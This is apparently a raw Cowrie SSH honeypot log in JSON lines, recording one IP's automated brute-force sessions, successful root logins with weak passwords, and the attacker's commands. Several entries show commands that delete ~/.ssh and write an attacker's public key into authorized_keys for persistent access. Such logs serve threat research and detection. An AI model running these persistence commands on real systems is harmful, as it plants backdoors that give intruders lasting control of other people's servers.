{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:32.285751Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
{"eventid":"cowrie.login.success","username":"root","password":"9527","message":"login attempt [root/9527] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:55:33.244101Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46592,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a269d6223e1","protocol":"ssh","message":"New connection: 212.227.235.229:46592 (1.2.3.4:22) [session: 3a269d6223e1]","sensor":"my-vps","timestamp":"2025-08-28T15:55:33.522424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:33.523363Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:55:33.719348Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:55:33.720017Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:55:33.721303Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:33.750627Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:33.951381Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:55:34.471289Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:55:34.472038Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
{"eventid":"cowrie.login.success","username":"root","password":"Pr@ject94","message":"login attempt [root/Pr@ject94] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:55:34.702506Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:55:34.704119Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:34.704917Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51970,"dst_ip":"1.2.3.4","dst_port":22,"session":"76a97b69ca11","protocol":"ssh","message":"New connection: 212.227.235.229:51970 (1.2.3.4:22) [session: 76a97b69ca11]","sensor":"my-vps","timestamp":"2025-08-28T15:55:34.943892Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:34.944711Z","src_ip":"212.227.235.229","session":"76a97b69ca11"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:55:35.173903Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:55:35.174742Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:55:35.176100Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:35.184696Z","src_ip":"212.227.235.229","session":"76a97b69ca11"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:35.404662Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:55:35.918322Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:55:35.919180Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:55:36.148676Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:36.149583Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:55:36.187177Z","src_ip":"212.227.235.229","session":"76a97b69ca11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46604,"dst_ip":"1.2.3.4","dst_port":22,"session":"21a14fdaad44","protocol":"ssh","message":"New connection: 212.227.235.229:46604 (1.2.3.4:22) [session: 21a14fdaad44]","sensor":"my-vps","timestamp":"2025-08-28T15:55:36.375261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:36.375972Z","src_ip":"212.227.235.229","session":"21a14fdaad44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:36.602033Z","src_ip":"212.227.235.229","session":"21a14fdaad44"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:37.429060Z","src_ip":"212.227.235.229","session":"76a97b69ca11"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:55:37.546005Z","src_ip":"212.227.235.229","session":"21a14fdaad44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52956,"dst_ip":"1.2.3.4","dst_port":22,"session":"edcc7bf478cb","protocol":"ssh","message":"New connection: 212.227.235.229:52956 (1.2.3.4:22) [session: edcc7bf478cb]","sensor":"my-vps","timestamp":"2025-08-28T15:55:37.658249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:37.659472Z","src_ip":"212.227.235.229","session":"edcc7bf478cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:37.895087Z","src_ip":"212.227.235.229","session":"edcc7bf478cb"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:38.773345Z","src_ip":"212.227.235.229","session":"21a14fdaad44"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:55:38.881132Z","src_ip":"212.227.235.229","session":"edcc7bf478cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39620,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8dc26209433","protocol":"ssh","message":"New connection: 212.227.235.229:39620 (1.2.3.4:22) [session: e8dc26209433]","sensor":"my-vps","timestamp":"2025-08-28T15:55:38.994376Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:38.995306Z","src_ip":"212.227.235.229","session":"e8dc26209433"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:39.119347Z","src_ip":"212.227.235.229","session":"edcc7bf478cb"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:39.123740Z","src_ip":"212.227.235.229","session":"b833f4fd2039"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:39.216985Z","src_ip":"212.227.235.229","session":"e8dc26209433"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:55:40.145185Z","src_ip":"212.227.235.229","session":"e8dc26209433"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:40.368536Z","src_ip":"212.227.235.229","session":"e8dc26209433"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:55:40.369473Z","src_ip":"212.227.235.229","session":"3a269d6223e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38624,"dst_ip":"1.2.3.4","dst_port":22,"session":"5799d50b3cc7","protocol":"ssh","message":"New connection: 212.227.235.229:38624 (1.2.3.4:22) [session: 5799d50b3cc7]","sensor":"my-vps","timestamp":"2025-08-28T15:55:57.720556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:55:57.721471Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:55:57.977924Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd@123","message":"login attempt [root/abcd@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:55:59.044816Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:55:59.967856Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:55:59.968562Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:55:59.969582Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:00.227463Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:56:00.758549Z","src_ip":"212.227.235.229","session":"5799d50b3cc7"}
